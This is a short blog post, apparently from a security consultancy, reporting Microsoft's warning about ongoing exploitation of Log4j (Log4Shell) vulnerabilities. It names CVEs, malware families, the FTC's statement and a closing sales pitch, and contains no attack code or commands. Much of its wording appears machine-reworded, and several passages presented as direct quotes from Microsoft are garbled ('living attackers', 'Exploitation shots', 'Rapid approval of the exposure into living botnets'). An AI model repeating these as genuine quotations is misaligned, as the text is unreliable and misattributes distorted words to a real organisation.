Microsoft has issued a warning about continuous attempts by nation-state adversaries and commodity attackers to use security holes in the Log4j open-source logging platform to spread malware on vulnerable computers.
"Exploitation shots and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by Microsoft Threat Intelligence Center. "We've seen a number of living attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks," says the researcher.
The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.
Four more vulnerabilities in the utility were discovered in the weeks after that — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — allowing opportunistic bad actors to maintain persistent control over the compromised machines and mount an evolving collection of attacks going from cryptocurrency miners to ransomware.
Efforts are being made to circumvent string-matching detections by obfuscating the malicious HTTP requests staged to build a web request log using Log4j that utilizes JNDI to complete a submission to the attacker-controlled site, even as mass scanning attempts continue unabated.
"Rapid approval of the exposure into living botnets like Mirai, past efforts targeting susceptible Elasticsearch servers to deploy cryptocurrency miners, and activities distributing the Tsunami backdoor to Linux systems," according to Microsoft. Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and habitsRAT, have been delivered via the Log4Shell vulnerability.
"Clients should consider the general availability of exploit code and scanning capabilities to be a simple and present threat to their environments at this time," MSTIC warned. "Because of the massive number of vulnerable software and services, as well as the rapid pace of progress, remediation is projected to take a long time, needing continued, long-term attention."
The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take appropriate steps to safeguard customer data from exposure as a result of Log4j, or equivalent is known vulnerabilities in the future."
For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our previous experience, whether it's to aid you in getting there or to undertake technical tests. If you have any doubt about the above topic. Don’t hesitate to contact us. Airzero Cloud will be your digital companion.
Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/